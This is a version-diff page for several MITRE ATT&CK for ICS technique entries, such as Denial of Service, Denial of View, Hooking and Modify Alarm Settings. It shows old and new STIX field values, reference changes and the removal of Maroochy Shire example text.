descriptionAdversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) In the Maroochy Shire attack, the adversary temporarily shut an investigator out of the network preventing them from issuing any controls.(Citation: Marshall Abrams July 2008) In the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) In the 2017 Dallas Siren incident operators were unable to disable the false alarms from the Office of Emergency Management headquarters. (Citation: Mark Loveless April 2017)
kill_chain_phases[0]['phase_name']impact-icsimpact
external_references[3]['source_name']Marshall Abrams July 2008Michael J. Assante and Robert M. Lee
external_references[3]['description']Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04
external_references[3]['url']https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdfhttps://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
external_references[4]['source_name']Michael J. Assante and Robert M. LeeTyson Macaulay
external_references[4]['description']Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04
external_references[4]['url']https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Tyson Macaulay', 'description': 'Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ', 'url': 'https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false'}

[T0814] Denial of Service

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may perform Denial-of-Service (DoS) attacks to dt1Adversaries may perform Denial-of-Service (DoS) attacks to d
>isrupt expected device functionality. Examples of DoS attack>isrupt expected device functionality. Examples of DoS attack
>s include overwhelming the target device with a high volume >s include overwhelming the target device with a high volume 
>of requests in a short time period and sending the target de>of requests in a short time period and sending the target de
>vice a request it does not know how to handle. Disrupting de>vice a request it does not know how to handle. Disrupting de
>vice state may temporarily render it unresponsive, possibly >vice state may temporarily render it unresponsive, possibly 
>lasting until a reboot can occur. When placed in this state,>lasting until a reboot can occur. When placed in this state,
> devices may be unable to send and receive requests, and may> devices may be unable to send and receive requests, and may
> not perform expected response functions in reaction to othe> not perform expected response functions in reaction to othe
>r events in the environment.   Some ICS devices are particul>r events in the environment.   Some ICS devices are particul
>arly sensitive to DoS events, and may become unresponsive in>arly sensitive to DoS events, and may become unresponsive in
> reaction to even a simple ping sweep. Adversaries may also > reaction to even a simple ping sweep. Adversaries may also 
>attempt to execute a Permanent Denial-of-Service (PDoS) agai>attempt to execute a Permanent Denial-of-Service (PDoS) agai
>nst certain devices, such as in the case of the BrickerBot m>nst certain devices, such as in the case of the BrickerBot m
>alware. (Citation: ICS-CERT April 2017)   Adversaries may ex>alware. (Citation: ICS-CERT April 2017)   Adversaries may ex
>ploit a software vulnerability to cause a denial of service >ploit a software vulnerability to cause a denial of service 
>by taking advantage of a programming error in a program, ser>by taking advantage of a programming error in a program, ser
>vice, or within the operating system software or kernel itse>vice, or within the operating system software or kernel itse
>lf to execute adversary-controlled code. Vulnerabilities may>lf to execute adversary-controlled code. Vulnerabilities may
> exist in software that can be used to cause a denial of ser> exist in software that can be used to cause a denial of ser
>vice condition.   Adversaries may have prior knowledge about>vice condition.   Adversaries may have prior knowledge about
> industrial protocols or control devices used in the environ> industrial protocols or control devices used in the environ
>ment through [Remote System Information Discovery](https://a>ment through [Remote System Information Discovery](https://a
>ttack.mitre.org/techniques/T0888). There are examples of adv>ttack.mitre.org/techniques/T0888). There are examples of adv
>ersaries remotely causing a [Device Restart/Shutdown](https:>ersaries remotely causing a [Device Restart/Shutdown](https:
>//attack.mitre.org/techniques/T0816) by exploiting a vulnera>//attack.mitre.org/techniques/T0816) by exploiting a vulnera
>bility that induces uncontrolled resource consumption. (Cita>bility that induces uncontrolled resource consumption. (Cita
>tion: ICS-CERT August 2018) (Citation: Common Weakness Enume>tion: ICS-CERT August 2018) (Citation: Common Weakness Enume
>ration January 2019) (Citation: MITRE March 2018)   In the M>ration January 2019) (Citation: MITRE March 2018) 
>aroochy Shire attack, the adversary shut an investigator out 
> of the network.(Citation: Marshall Abrams July 2008) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:17:08.160000+00:002023-03-30 20:16:01.922000+00:00
descriptionAdversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) In the Maroochy Shire attack, the adversary shut an investigator out of the network.(Citation: Marshall Abrams July 2008)Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018)
external_references[4]['source_name']Marshall Abrams July 2008MITRE March 2018
external_references[4]['description']Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 MITRE 2018, March 22 CVE-2015-5374 Retrieved. 2019/03/14
external_references[4]['url']https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdfhttps://nvd.nist.gov/vuln/detail/CVE-2015-5374
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'MITRE March 2018', 'description': 'MITRE 2018, March 22 CVE-2015-5374 Retrieved. 2019/03/14 ', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-5374'}
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T0815] Denial of View

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may cause a denial of view in attempt to disruptt1Adversaries may cause a denial of view in attempt to disrupt
> and prevent operator oversight on the status of an ICS envi> and prevent operator oversight on the status of an ICS envi
>ronment. This may manifest itself as a temporary communicati>ronment. This may manifest itself as a temporary communicati
>on failure between a device and its control source, where th>on failure between a device and its control source, where th
>e interface recovers and becomes available once the interfer>e interface recovers and becomes available once the interfer
>ence ceases. (Citation: Corero) (Citation: Michael J. Assant>ence ceases. (Citation: Corero) (Citation: Michael J. Assant
>e and Robert M. Lee) (Citation: Tyson Macaulay)   An adversa>e and Robert M. Lee) (Citation: Tyson Macaulay)   An adversa
>ry may attempt to deny operator visibility by preventing the>ry may attempt to deny operator visibility by preventing the
>m from receiving status and reporting messages. Denying this>m from receiving status and reporting messages. Denying this
> view may temporarily block and prevent operators from notic> view may temporarily block and prevent operators from notic
>ing a change in state or anomalous behavior. The environment>ing a change in state or anomalous behavior. The environment
>'s data and processes may still be operational, but function>'s data and processes may still be operational, but function
>ing in an unintended or adversarial manner.   In the Marooch>ing in an unintended or adversarial manner. 
>y Shire attack, the adversary temporarily shut an investigat 
>or out of the network, preventing them from viewing the stat 
>e of the system.(Citation: Marshall Abrams July 2008) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:08:38.480000+00:002023-03-30 20:16:25.031000+00:00
descriptionAdversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. In the Maroochy Shire attack, the adversary temporarily shut an investigator out of the network, preventing them from viewing the state of the system.(Citation: Marshall Abrams July 2008)Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner.
kill_chain_phases[0]['phase_name']impact-icsimpact
external_references[2]['source_name']Marshall Abrams July 2008Michael J. Assante and Robert M. Lee
external_references[2]['description']Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04
external_references[2]['url']https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdfhttps://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
external_references[3]['source_name']Michael J. Assante and Robert M. LeeTyson Macaulay
external_references[3]['description']Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04
external_references[3]['url']https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Tyson Macaulay', 'description': 'Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ', 'url': 'https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false'}

[T0822] External Remote Services

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may leverage external remote services as a pointt1Adversaries may leverage external remote services as a point
> of initial access into your network. These services allow u> of initial access into your network. These services allow u
>sers to connect to internal network resources from external >sers to connect to internal network resources from external 
>locations. Examples are VPNs, Citrix, and other access mecha>locations. Examples are VPNs, Citrix, and other access mecha
>nisms. Remote service gateways often manage connections and >nisms. Remote service gateways often manage connections and 
>credential authentication for these services. (Citation: Dan>credential authentication for these services. (Citation: Dan
>iel Oakley, Travis Smith, Tripwire)  External remote service>iel Oakley, Travis Smith, Tripwire)  External remote service
>s allow administration of a control system from outside the >s allow administration of a control system from outside the 
>system. Often, vendors and internal engineering groups have >system. Often, vendors and internal engineering groups have 
>access to external remote services to control system network>access to external remote services to control system network
>s via the corporate network. In some cases, this access is e>s via the corporate network. In some cases, this access is e
>nabled directly from the internet. While remote access enabl>nabled directly from the internet. While remote access enabl
>es ease of maintenance when a control system is in a remote >es ease of maintenance when a control system is in a remote 
>area, compromise of remote access solutions is a liability. >area, compromise of remote access solutions is a liability. 
>The adversary may use these services to gain access to and e>The adversary may use these services to gain access to and e
>xecute attacks against a control system network. Access to v>xecute attacks against a control system network. Access to v
>alid accounts is often a requirement.   As they look for an >alid accounts is often a requirement.   As they look for an 
>entry point into the control system network, adversaries may>entry point into the control system network, adversaries may
> begin searching for existing point-to-point VPN implementat> begin searching for existing point-to-point VPN implementat
>ions at trusted third party networks or through remote suppo>ions at trusted third party networks or through remote suppo
>rt employee connections where split tunneling is enabled. (C>rt employee connections where split tunneling is enabled. (C
>itation: Electricity Information Sharing and Analysis Center>itation: Electricity Information Sharing and Analysis Center
>; SANS Industrial Control Systems March 2016)  In the Marooc>; SANS Industrial Control Systems March 2016) 
>hy Shire attack, the adversary gained remote computer access 
> to the system over radio.(Citation: Marshall Abrams July 20 
>08) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:07:53.764000+00:002023-03-30 20:16:55.602000+00:00
descriptionAdversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire) External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016) In the Maroochy Shire attack, the adversary gained remote computer access to the system over radio.(Citation: Marshall Abrams July 2008)Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire) External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentNetwork Traffic: Network Traffic Flow
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}

[T0874] Hooking

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may hook into application programming interface t1Adversaries may hook into application programming interface 
>(API) functions used by processes to redirect calls for exec>(API) functions used by processes to redirect calls for exec
>ution and privilege escalation means. Windows processes ofte>ution and privilege escalation means. Windows processes ofte
>n leverage these API functions to perform tasks that require>n leverage these API functions to perform tasks that require
> reusable system resources. Windows API functions are typica> reusable system resources. Windows API functions are typica
>lly stored in dynamic-link libraries (DLLs) as exported func>lly stored in dynamic-link libraries (DLLs) as exported func
>tions. (Citation: Enterprise ATT&CK)  One type of hooking se>tions. (Citation: Enterprise ATT&CK)  One type of hooking se
>en in ICS involves redirecting calls to these functions via >en in ICS involves redirecting calls to these functions via 
>import address table (IAT) hooking. IAT hooking uses modific>import address table (IAT) hooking. IAT hooking uses modific
>ations to a processs IAT, where pointers to imported API fun>ations to a process IAT, where pointers to imported API func
>ctions are stored. (Citation: Nicolas Falliere, Liam O Murch>tions are stored. (Citation: Nicolas Falliere, Liam O Murchu
>u, Eric Chien February 2011)>, Eric Chien February 2011)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 15:40:42.017000+00:002023-03-13 13:32:08.619000+00:00
descriptionAdversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK) One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a processs IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK) One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
kill_chain_phases[0]['phase_name']execution-icsexecution
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: OS API ExecutionProcess: Process Metadata
x_mitre_data_sources[1]Process: Process MetadataProcess: OS API Execution
x_mitre_version1.11.2

[T0838] Modify Alarm Settings

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may modify alarm settings to prevent alerts thatt1Adversaries may modify alarm settings to prevent alerts that
> may inform operators of their presence or to prevent respon> may inform operators of their presence or to prevent respon
>ses to dangerous and unintended scenarios. Reporting message>ses to dangerous and unintended scenarios. Reporting message
>s are a standard part of data acquisition in control systems>s are a standard part of data acquisition in control systems
>. Reporting messages are used as a way to transmit system st>. Reporting messages are used as a way to transmit system st
>ate information and acknowledgements that specific actions h>ate information and acknowledgements that specific actions h
>ave occurred. These messages provide vital information for t>ave occurred. These messages provide vital information for t
>he management of a physical process, and keep operators, eng>he management of a physical process, and keep operators, eng
>ineers, and administrators aware of the state of system devi>ineers, and administrators aware of the state of system devi
>ces and physical processes.   If an adversary is able to cha>ces and physical processes.   If an adversary is able to cha
>nge the reporting settings, certain events could be prevente>nge the reporting settings, certain events could be prevente
>d from being reported. This type of modification can also pr>d from being reported. This type of modification can also pr
>event operators or devices from performing actions to keep t>event operators or devices from performing actions to keep t
>he system in a safe state. If critical reporting messages ca>he system in a safe state. If critical reporting messages ca
>nnot trigger these actions then a [Impact](http://attacksite>nnot trigger these actions then a [Impact](https://attack.mi
>.mitre.org/tactics/TA0105/) could occur.   In ICS environmen>tre.org/tactics/TA0105) could occur.   In ICS environments, 
>ts, the adversary may have to use [Alarm Suppression](https:>the adversary may have to use [Alarm Suppression](https://at
>//attack.mitre.org/techniques/T0878) or contend with multipl>tack.mitre.org/techniques/T0878) or contend with multiple al
>e alarms and/or alarm propagation to achieve a specific goal>arms and/or alarm propagation to achieve a specific goal to 
> to evade detection or prevent intended responses from occur>evade detection or prevent intended responses from occurring
>ring. (Citation: Jos Wetzels, Marina Krotofil 2019)  Methods>. (Citation: Jos Wetzels, Marina Krotofil 2019)  Methods of 
> of suppression often rely on modification of alarm settings>suppression often rely on modification of alarm settings, su
>, such as modifying in memory code to fixed values or tamper>ch as modifying in memory code to fixed values or tampering 
>ing with assembly level instruction code.   In the Maroochy >with assembly level instruction code. 
>Shire attack, the adversary disabled alarms at four pumping  
>stations. This caused alarms to not be reported to the centr 
>al computer.(Citation: Marshall Abrams July 2008) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:14:48.212000+00:002023-03-30 20:17:43.803000+00:00
descriptionAdversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](http://attacksite.mitre.org/tactics/TA0105/) could occur. In ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code. In the Maroochy Shire attack, the adversary disabled alarms at four pumping stations. This caused alarms to not be reported to the central computer.(Citation: Marshall Abrams July 2008)Adversaries may modify alarm settings to prevent alerts that may inform operators of their presence or to prevent responses to dangerous and unintended scenarios. Reporting messages are a standard part of data acquisition in control systems. Reporting messages are used as a way to transmit system state information and acknowledgements that specific actions have occurred. These messages provide vital information for the management of a physical process, and keep operators, engineers, and administrators aware of the state of system devices and physical processes. If an adversary is able to change the reporting settings, certain events could be prevented from being reported. This type of modification can also prevent operators or devices from performing actions to keep the system in a safe state. If critical reporting messages cannot trigger these actions then a [Impact](https://attack.mitre.org/tactics/TA0105) could occur. In ICS environments, the adversary may have to use [Alarm Suppression](https://attack.mitre.org/techniques/T0878) or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression often rely on modification of alarm settings, such as modifying in memory code to fixed values or tampering with assembly level instruction code.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentAsset: Asset Inventory
x_mitre_data_sources[3]Asset: Asset InventoryNetwork Traffic: Network Traffic Content
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}

[T0836] Modify Parameter

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may modify parameters used to instruct industriat1Adversaries may modify parameters used to instruct industria
>l control system devices. These devices operate via programs>l control system devices. These devices operate via programs
> that dictate how and when to perform actions based on such > that dictate how and when to perform actions based on such 
>parameters. Such parameters can determine the extent to whic>parameters. Such parameters can determine the extent to whic
>h an action is performed and may specify additional options.>h an action is performed and may specify additional options.
> For example, a program on a control system device dictating> For example, a program on a control system device dictating
> motor processes may take a parameter defining the total num> motor processes may take a parameter defining the total num
>ber of seconds to run that motor.        An adversary can po>ber of seconds to run that motor.        An adversary can po
>tentially modify these parameters to produce an outcome outs>tentially modify these parameters to produce an outcome outs
>ide of what was intended by the operators. By modifying syst>ide of what was intended by the operators. By modifying syst
>em and process critical parameters, the adversary may cause >em and process critical parameters, the adversary may cause 
>[Impact](https://attack.mitre.org/tactics/TA0105) to equipme>[Impact](https://attack.mitre.org/tactics/TA0105) to equipme
>nt and/or control processes. Modified parameters may be turn>nt and/or control processes. Modified parameters may be turn
>ed into dangerous, out-of-bounds, or unexpected values from >ed into dangerous, out-of-bounds, or unexpected values from 
>typical operations. For example, specifying that a process r>typical operations. For example, specifying that a process r
>un for more or less time than it should, or dictating an unu>un for more or less time than it should, or dictating an unu
>sually high, low, or invalid value as a parameter.  In the M>sually high, low, or invalid value as a parameter.
>aroochy Shire attack, the adversary gained remote computer a 
>ccess to the control system and altered data so that whateve 
>r function should have occurred at affected pumping stations 
> did not occur or occurred in a different way. The software  
>program installed in the laptop was one developed for changi 
>ng configurations in the PDS computers. This ultimately led  
>to 800,000 liters of raw sewage being spilled out into the c 
>ommunity.(Citation: Marshall Abrams July 2008) 

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 18:13:48.146000+00:002023-04-05 14:15:29.756000+00:00
descriptionAdversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter. In the Maroochy Shire attack, the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. The software program installed in the laptop was one developed for changing configurations in the PDS computers. This ultimately led to 800,000 liters of raw sewage being spilled out into the community.(Citation: Marshall Abrams July 2008)Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentOperational Databases: Device Alarm
x_mitre_data_sources[3]Operational Databases: Device AlarmNetwork Traffic: Network Traffic Content
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
